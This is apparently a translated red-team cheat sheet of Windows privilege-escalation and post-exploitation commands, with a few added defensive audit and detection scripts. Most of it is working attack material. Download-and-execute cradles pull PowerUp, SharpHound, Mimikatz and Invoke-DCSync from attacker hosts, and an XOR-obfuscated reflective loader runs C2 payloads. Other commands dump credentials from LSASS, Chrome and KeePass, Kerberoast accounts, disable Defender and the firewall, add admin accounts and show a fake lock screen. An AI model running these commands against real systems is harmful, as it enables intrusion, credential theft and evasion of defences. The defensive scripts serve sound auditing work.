PowerUp.ps1 privesc

powershell.exe /c IEX(New-Object Net.WebClient).downloadString('webserver/PowerUp.ps1') ;Invoke-AllChecks

SharpUp privesc

# https://github.com/GhostPack/SharpUp

A C# implementation of PowerUp.ps1 that can be reflectively loaded.

In an AD environment, enumerate with BloodHound

SharpHound.ps1
SharpHound.exe -> https://github.com/BloodHoundAD/SharpHound

IEX (New-Object System.Net.WebClient).DownloadString('http://webserver:4444/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod All

Import the .zip into BloodHound

If you can't get the zip out... find a way ;) just kidding, just kidding. The output is plain JSON, so copy it by hand. It is a big pain, but it works.

BloodHound-Python enumeration

git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .

bloodhound-python -d m0chanAD.local -u m0chan -p Summer2019 -gc DOMAINCONTROLLER.m0chanAD.local -c all

Cleartext passwords in the registry

# Windows autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# PuTTY
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search the registry for "password"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Installed software

tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime

Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Weak folder permissions privesc

Full (F) permissions for Everyone / Users on program folders

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

Modify (M) permissions for Everyone / Users on program folders

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

Scheduled task query

schtasks /query /fo LIST /v

PowerShell command history

type C:\Users\m0chan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Connected drives

net use
wmic logicaldisk get caption,description

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Current user privileges

whoami /priv

Look for SeImpersonatePrivilege, SeDebugPrivilege etc.

Is anyone else logged on?

qwinsta

Registry autologon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

Stored credentials in Credential Manager

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unquoted service paths

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Startup items

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Check the AlwaysInstallElevated registry keys

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
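
The three checks above (weak Program Files permissions, unquoted service paths, AlwaysInstallElevated) are each a few findstr lines that leave the reader to judge the output. The script below is an added example written for these notes, not from the original article or from PowerUp: it reads the ACLs directly, works out which intermediate directories an unquoted path actually exposes, and applies the rule that AlwaysInstallElevated only takes effect when both hives are set. The function names and the list of "broad" identities are this script's own; the registry paths and ACL semantics are standard Windows.

```powershell
# Added example (not from the original notes): one local audit for the three
# privesc misconfigurations listed above, with the fix noted at the end.

$BroadIdentities = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

function Get-BroadWriteAce {
    # Allow ACEs that give a low-privileged group write-type rights on a directory.
    param([Parameter(Mandatory)] [string] $Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return }
    (Get-Acl -LiteralPath $Directory).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadIdentities -contains $_.IdentityReference.Value -and
        $_.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles|AppendData'
    } | ForEach-Object {
        [pscustomobject]@{ Directory = $Directory; Identity = $_.IdentityReference.Value; Rights = $_.FileSystemRights }
    }
}

function Get-WeakProgramFolder {
    # Same question as the icacls | findstr "(F)"/"(M)" lines, read from the ACL.
    foreach ($root in 'C:\Program Files', 'C:\Program Files (x86)') {
        Get-ChildItem -LiteralPath $root -Directory -ErrorAction SilentlyContinue |
            ForEach-Object { Get-BroadWriteAce -Directory $_.FullName }
    }
}

function Get-UnquotedServicePathFinding {
    # An unquoted C:\Program Files\My App\svc.exe is tried as C:\Program.exe,
    # then C:\Program Files\My.exe, so the directories that matter are the
    # parents of each space-separated prefix. Only writable ones are reported.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $exe = ($svc.PathName -split ' -| /')[0]
        if (-not $exe -or $exe -match '^"' -or $exe -notmatch ' ' -or $exe -like 'C:\Windows\*') { return }
        $parts = $exe -split ' '
        $dirs = for ($i = 1; $i -lt $parts.Count; $i++) {
            Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
        }
        foreach ($d in ($dirs | Where-Object { $_ } | Select-Object -Unique)) {
            foreach ($ace in Get-BroadWriteAce -Directory $d) {
                [pscustomobject]@{ Service = $svc.Name; PathName = $svc.PathName; Directory = $d; Identity = $ace.Identity; Rights = $ace.Rights }
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when BOTH the machine and the user value are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer', 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $v = foreach ($k in $keys) {
        [int](Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    [pscustomobject]@{ HKLM = $v[0]; HKCU = $v[1]; Effective = ($v[0] -eq 1 -and $v[1] -eq 1) }
}

'--- Program Files subfolders writable by broad groups ---'
Get-WeakProgramFolder | Format-Table -AutoSize
'--- Unquoted service paths with a writable intermediate directory ---'
Get-UnquotedServicePathFinding | Format-Table -AutoSize
'--- AlwaysInstallElevated ---'
Test-AlwaysInstallElevated

# Fixes: remove the broad ACE (icacls "<dir>" /remove:g Users), quote the service
# binary path (sc.exe config <svc> binPath= "\"C:\Program Files\My App\svc.exe\""),
# and set AlwaysInstallElevated to 0 in both hives (or remove the policy).
```

Empty output from the first two functions is the expected state on a well-built host; the unquoted-path list is deliberately limited to paths whose intermediate directory is actually writable, since an unquoted path under a directory only administrators can write to is untidy but not exploitable.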

Passwords in the registry?

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

Leftover Sysprep or unattended files

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

GPP (Group Policy Preferences) passwords

smbclient //DOMAINCONTROLLER.local/SYSVOL -U m0chan

\m0chanAD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\Preferences\Groups\

http://www.sec-1.com/blog/wp-content/uploads/2015/05/gp3finder_v4.0.zip - for decryption

Can also use PowerUp.ps1
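
From the defender's side the same SYSVOL walk finds leftover GPP credentials before anyone else does. The script below is an added example written for these notes, not from the original article or from gp3finder: it scans the GPP XML types that can carry a cpassword attribute and reports the files that still hold a value. The function name is this script's own; the file names are the standard GPP preference types.

```powershell
# Added example (not from the original notes): find Group Policy Preference
# files in SYSVOL that still carry a cpassword value. The AES key for that
# field is public, so any populated value is a readable credential.
function Find-GppCpassword {
    param([string] $SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")
    $gppFiles = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path $SysvolPath -Recurse -Include $gppFiles -File -ErrorAction SilentlyContinue |
        Select-String -Pattern 'cpassword="([^"]*)"' |
        ForEach-Object {
            [pscustomobject]@{
                File      = $_.Path
                Line      = $_.LineNumber
                # cpassword="" is harmless; a populated value is a stored secret.
                HasSecret = ($_.Matches[0].Groups[1].Value.Length -gt 0)
            }
        }
}

Find-GppCpassword | Where-Object HasSecret | Format-Table -AutoSize

# Fix: delete the preference item (or recreate it without a password) and rotate
# the credential it contained; since MS14-025 the editor refuses to save new ones,
# but files created before the patch stay in SYSVOL until someone removes them.
```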

Dump Chrome passwords (post-exploitation)

# git clone https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies -d [domain] -e
CookieMonster -a

Must be run in the context of the target user, because Chrome passwords are encrypted with DPAPI.

Can also use Mimikatz for this.

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data"

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect

Dump KeePass

# https://github.com/HarmJ0y/KeeThief
# http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Get-Process keepass
tasklist | findstr keepass

Attacking KeePass

# https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.

Token impersonation

# https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

Meterpreter's incognito can also be used to steal access/delegation tokens and impersonate users (requires admin/SYSTEM privs).

# Tokenvator https://github.com/0xbadjuju/Tokenvator

Reflectively load PowerShell, Cobalt, SilentTrinity etc...

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)


Reflectively loads a .NET assembly, for when you cannot do it through your C2 infrastructure

Juicy Potato privilege escalation

# Requires SeImpersonatePrivilege (typically found on service accounts: IIS service, SQL service etc)

# Reference https://ohpe.it/juicy-potato/

Requirements: SeAssignPrimaryTokenPrivilege and/or SeImpersonatePrivilege

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/JuicyPotato.exe','C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Backup\JuicyPotato.exe')

JuicyPotato.exe -l 1337 -p C:\Users\Public\Documents\Mochan.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}

Mochan.exe = Payload
5B3E6773-3A99-4A3D-8096-7765DD11785C = Target CLSID

A CLSID is a GUID that identifies a COM class object

Arguments for cmd.exe/powershell.exe etc. can also be passed with the -a flag

Juicy Potato must be run from a CMD shell, not from PowerShell

Kerberoasting 攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 深入查看我的博客文章Kerberos攻击以了解更多信息
# https://m0chan.github.io/Kerberos-Attacks-In-Depth

Get-DomainSPNTicket -Credential $cred -OutputFormat hashcat

because Hashcat over John anyday right?

Invoke-Kerberoast.ps1

python GetUserSPNs.py -request -dc-ip 10.10.14.15 m0chanad.local/serviceaccount

Ofc the above requires access to port 88 on the DC, but you can always port forward if you run GetUserSPNs.py manually.

https://github.com/GhostPack/SharpRoast --NOW Deprecated-- and incorporated into Rubeus with the kerberoast action

Kerberoast with Python

#https://github.com/skelsec/kerberoast


Important: the accepted formats are as follows
<ldap_connection_string> : <domainname>/<username>/<secret_type>:<secret>@<DC_ip>
<kerberos_connection_string>: <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>

Find vulnerable users via LDAP:
kerberoast ldap all <ldap_connection_string> -o ldapenum

AS-REP roast the users in the ldapenum_asrep_users.txt file:
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt

SPN roast the users in the ldapenum_spn_users.txt file:
kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt

AS-REP Roasting attack

# Accounts must have DONT_REQ_PREAUTH explicitly set to be vulnerable

Get-ASRepHash -Domain m0chanAD.local -User victim

Can also use Rubeus (reflectively load the .NET assembly).

.\Rubeus.exe asreproast
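On the defender side, both the Kerberoasting and AS-REP roasting sections above leave a footprint in the Security log: RC4 (etype 0x17) service-ticket requests for user SPNs (EventID 4769) and TGT requests without pre-authentication (EventID 4768, PreAuthType 0). The example below is added here and is not from the original notes; the event records are constructed, and the burst threshold is a hypothetical tuning value.

```python
"""Flag Kerberoast- and AS-REP-roast-style ticket requests in constructed
Windows Security event records (EventID 4769 / 4768 field subsets)."""
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23: the downgraded, offline-crackable ticket encryption
TGS_BURST = 3       # hypothetical threshold: service tickets per requester before alerting

# Constructed sample events (not real log data).
EVENTS = [
    {"id": 4769, "user": "alice@CORP.LOCAL", "service": "krbtgt",     "etype": "0x17"},
    {"id": 4769, "user": "alice@CORP.LOCAL", "service": "WS01$",      "etype": "0x12"},
    {"id": 4769, "user": "bob@CORP.LOCAL",   "service": "svc_sql",    "etype": "0x17"},
    {"id": 4769, "user": "bob@CORP.LOCAL",   "service": "svc_http",   "etype": "0x17"},
    {"id": 4769, "user": "bob@CORP.LOCAL",   "service": "svc_backup", "etype": "0x17"},
    {"id": 4768, "user": "victim", "preauth": "0", "etype": "0x17"},
    {"id": 4768, "user": "carol",  "preauth": "2", "etype": "0x12"},
]


def roastable_tgs(ev):
    """4769 for a user SPN (not krbtgt, not a machine account) issued with RC4:
    the pattern a Kerberoast request produces."""
    return (ev["id"] == 4769 and ev["etype"] == RC4_HMAC
            and ev["service"] != "krbtgt" and not ev["service"].endswith("$"))


def asrep_roastable(ev):
    """4768 with PreAuthType 0 means no pre-authentication was required, i.e.
    the account has DONT_REQ_PREAUTH set; RC4 makes the AS-REP crackable."""
    return ev["id"] == 4768 and ev.get("preauth") == "0" and ev["etype"] == RC4_HMAC


def find_roasting(events, burst=TGS_BURST):
    """Return {'kerberoast': [(requester, n_tickets)], 'asrep': [account, ...]}."""
    per_user = defaultdict(int)
    asrep = []
    for ev in events:
        if roastable_tgs(ev):
            per_user[ev["user"]] += 1
        elif asrep_roastable(ev):
            asrep.append(ev["user"])
    kerberoast = [(u, n) for u, n in per_user.items() if n >= burst]
    return {"kerberoast": kerberoast, "asrep": asrep}


if __name__ == "__main__":
    print(find_roasting(EVENTS))
```

Accounts that legitimately need RC4 or no pre-authentication will show up here too, so the hits are a review list, not a verdict.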

DCSync attack

# Running DCSync requires special privileges. Any member of Administrators, Domain Admins or Enterprise Admins, as well as Domain Controller computer accounts, can run DCSync to pull password data. Note that Read-Only Domain Controllers are not allowed to pull user password data by default.

# As well as anyone with the Replicating Changes permissions set to Allow (i.e. Replicating Directory Changes All / Replicating Directory Changes)

mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

powershell.exe -Version 2 -Exec Bypass /c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:8000/Invoke-DCSync.ps1'); Invoke-DCSync -PWDumpFormat"


Empire Module: powershell/credentials/mimikatz/dcsync_hashdump
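Because DCSync is just a replication request, the defender's signal is EventID 4662 on the domain controller with the replication control-access rights in the Properties field, issued by an account that is not itself a DC. The example below is added here and is not from the original notes; the 4662 records are constructed and the DC account list is a parameter because the notes name none.

```python
"""Spot DCSync-style replication requests in constructed EventID 4662 records."""

# Control-access right GUIDs that DCSync needs (DS-Replication-Get-Changes family).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample 4662 events: subject account, access mask, Properties field.
EVENTS = [
    {"subject": "CORP\\DC01$", "mask": "0x100",
     "props": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "CORP\\jdoe", "mask": "0x100",
     "props": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "CORP\\jdoe", "mask": "0x10",
     "props": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(props):
    """Return the names of replication rights present in a 4662 Properties field."""
    guids = {p.strip("{}").lower() for p in props.split()}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def find_dcsync(events, dc_accounts):
    """Return [(subject, [rights])] for replication requests made by accounts
    that are not domain controllers. Access mask 0x100 = Control Access."""
    dcs = {d.upper() for d in dc_accounts}
    hits = []
    for ev in events:
        if ev["mask"].lower() != "0x100":
            continue
        rights = replication_rights(ev["props"])
        if rights and ev["subject"].upper() not in dcs:
            hits.append((ev["subject"], rights))
    return hits


if __name__ == "__main__":
    print(find_dcsync(EVENTS, ["CORP\\DC01$"]))
```

Auditing of directory service access on the domain naming context must be enabled for these events to exist at all, which is the first thing to verify when the query returns nothing.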

Escalate from an Administrator account to a SYSTEM shell using Windows Terminal

# https://twitter.com/spotheplanet/status/1318487486826504197/photo/1

PsExec.exe -i -s "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal.X.X\WindowsTerminal.exe"

5. Windows Post-Exploitation Techniques

Common post-exploitation commands

net user m0chan /add /domain
net localgroup Administrators m0chan /add

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable firewall
netsh firewall set opmode disable

Or like this
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you get this error:

CredSSP Error Fix ->

Add this reg key:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

Dump locked files with esentutl.exe

C:\WINDOWS\system32\esentutl.exe /y <SOURCE> /vss /d <DEST>


Useful if you want to dump SAM and/or SYSTEM but the files are locked by the OS (Windows 10)

Check whether PowerShell logging is enabled

reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription

Seatbelt security enumeration tool

# https://github.com/GhostPack/Seatbelt

This is really great, it enumerates everything you need and is also a .NET assembly, so it can be reflectively loaded to avoid AV :D win-win

BasicOSInfo - Basic OS info (i.e. architecture, OS version, etc.)
RebootSchedule - Reboot schedule (last 15 days) based on event IDs 12 and 13
TokenGroupPrivs - Current process/token privileges (e.g. SeDebugPrivilege/etc.)
UACSystemPolicies - UAC system policies via the registry
PowerShellSettings - PowerShell versions and security settings
AuditSettings - Audit settings via the registry
WEFSettings - Windows Event Forwarding (WEF) settings via the registry
LSASettings - LSA settings (including auth packages)
UserEnvVariables - Current user environment variables
SystemEnvVariables - Current system environment variables
UserFolders - Folders in C:\Users\
NonstandardServices - Services with file info company names that don't contain 'Microsoft'
InternetSettings - Internet settings including proxy configs
LapsSettings - LAPS settings, if installed
LocalGroupMembers - Members of local admins, RDP, and DCOM
MappedDrives - Mapped drives
RDPSessions - Current incoming RDP sessions
WMIMappedDrives - Mapped drives via WMI
NetworkShares - Network shares
FirewallRules - Deny firewall rules, "full" dumps all
AntiVirusWMI - Registered antivirus (via WMI)
InterestingProcesses - "Interesting" processes- defensive products and admin tools
RegistryAutoRuns - Registry autoruns
RegistryAutoLogon - Registry autologon information
DNSCache - DNS cache entries (via WMI)
ARPTable - Lists the current ARP table and adapter information (equivalent to arp -a)
AllTcpConnections - Lists current TCP connections and associated processes
AllUdpConnections - Lists current UDP connections and associated processes
NonstandardProcesses - Running processes with file info company names that don't contain 'Microsoft'
* If the user is in high integrity, the following additional actions are run:
SysmonConfig - Sysmon configuration from the registry

And more!!

Dumping credentials

(new-object System.Net.WebClient).DownloadString('http://10.10.14.5:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz 

Can also run Mimikatz.exe after some AV evasion, removing strings etc. ippSec has a good tutorial.

mimikatz.exe
privilege::debug
sekurlsa::logonPasswords full

A safer method is to dump the process memory of LSASS.exe with MiniDump
(https://github.com/3xpl01tc0d3r/Minidump)

(or) https://github.com/GhostPack/SharpDump

and send the .bin to Mimikatz locally.

sekurlsa::minidump C:\users\m0chan\lssas.dmp

Can also be used for dumping and pass-the-ticket attacks, but that will be covered elsewhere.

Mimikatz Guide

#Logon Sessions

sekurlsa::logonPasswords all

#Dump Cache

lsadump::cache

#Dump SAM

lsadump::sam

Dumping credentials 2

# https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

Remotely dump SAM with WinRM

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\sam c:\temp\sam.save}

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\system c:\temp\system.save}

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\security c:\temp\security.save}

Run Mimikatz with GadgetToJScript or VBS

# https://gist.github.com/med0x2e/cc10d42b1f581507013e801da2651c74

cscript mimi.js privilege::debug < safe.txt

SessionGopher tool

# https://github.com/Arvanaghi/SessionGopher

Quietly digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP

SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has built-in WMI functionality so it can be run remotely. Its best use case is identifying systems that may connect to Unix systems, jump boxes, or point-of-sale terminals.

Invoke-SessionGopher -Thorough

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Dump Chrome passwords (also post-exploitation)

# git clone https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies -d [domain] -e
CookieMonster -a

Must be run in the context of the target user, since Chrome passwords are encrypted with DPAPI.

Can also use Mimikatz for this.

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data"

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect

Dump process memory w/ Mimikittenz

# https://github.com/putterpanda/mimikittenz

mimikittenz is a post-exploitation PowerShell tool that uses the Windows function ReadProcessMemory() to extract plaintext passwords from various target processes.

The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction to maximise post-exploitation efforts and increase the value of information gathered per target.

Invoke-Mimikittenz

Dump KeePass

# https://github.com/HarmJ0y/KeeThief
# http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Get-Process keepass
tasklist | findstr keepass

Attacking KeePass

# https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.

pypykatz tool

# https://github.com/skelsec/pypykatz

Full python implementation of Mimikatz :D

pip3 install pypykatz

SafetyKatz tool

# https://github.com/GhostPack/SafetyKatz

Full C Sharp implementation of Mimikatz that can be reflectively loaded :D

"SafetyKatz is a combination of slightly modified versions of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.

First, the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtee's PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file, removing the file after execution is complete."

SharpDPAPI tool

# https://github.com/GhostPack/SharpDPAPI

Full C Sharp implementation of Mimikatz's DPAPI functionality, allowing access to DPAPI features.

SharpSniper tool

# https://github.com/HunnicCyber/SharpSniper

Often a red team engagement is about more than achieving domain admin. Some clients want to see whether a specific user in the domain, such as the CEO, can be compromised.

SharpSniper is a simple tool to find the IP address of these users so you can target their boxes.

C:\> SharpSniper.exe emusk DomainAdminUser DAPass123

User: emusk - IP Address: 192.168.37.130

SharpLocker tool

# https://github.com/Pickfordmatt/SharpLocker

SharpLocker helps capture the current user's credentials by popping a fake Windows lock screen; all output is sent to the console, which works well with Cobalt Strike.

Check for missing KB patches

watson.exe
Sherlock.ps1

Use the Watson.exe assembly and reflectively load the .NET assembly into memory to avoid antivirus.

More at the bottom re: reflective loading. (Changing some strings etc. doesn't hurt either)

https://github.com/rasta-mouse/Watson

Decrypt EFS files with Mimikatz (if Admin/System)

# https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files

cipher /c "d:\Users\Gentil Kiwi\Documents\m0chan.txt" - View if a file is EFS encrypted and who can decrypt it; sometimes impersonating a token is easier than manually decrypting with mimikatz.

privilege::debug
token::elevate
crypto::system /file:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B53C6DE283C00203587A03DD3D0BF66E16969A55" /export

dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b"

dpapi::masterkey /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Protect\S-1-5-21-494464150-3436831043-1864828003-1001\1eccdbd2-4771-4360-8b19-9d6060a061dc" /password:waza1234/

dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in B53C6DE283C00203587A03DD3D0BF66E16969A55.der -out public.pem

openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot

UAC Bypass

https://egre55.github.io/system-properties-uac-bypass/ - Read Ghoul writeup on HTB for more Info 

findstr /C:"<autoElevate>true"

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
C:\Windows\SysWOW64\SystemPropertiesComputerName.exe
C:\Windows\SysWOW64\SystemPropertiesHardware.exe
C:\Windows\SysWOW64\SystemPropertiesProtection.exe
C:\Windows\SysWOW64\SystemPropertiesRemote.exe

Golden Ticket attack

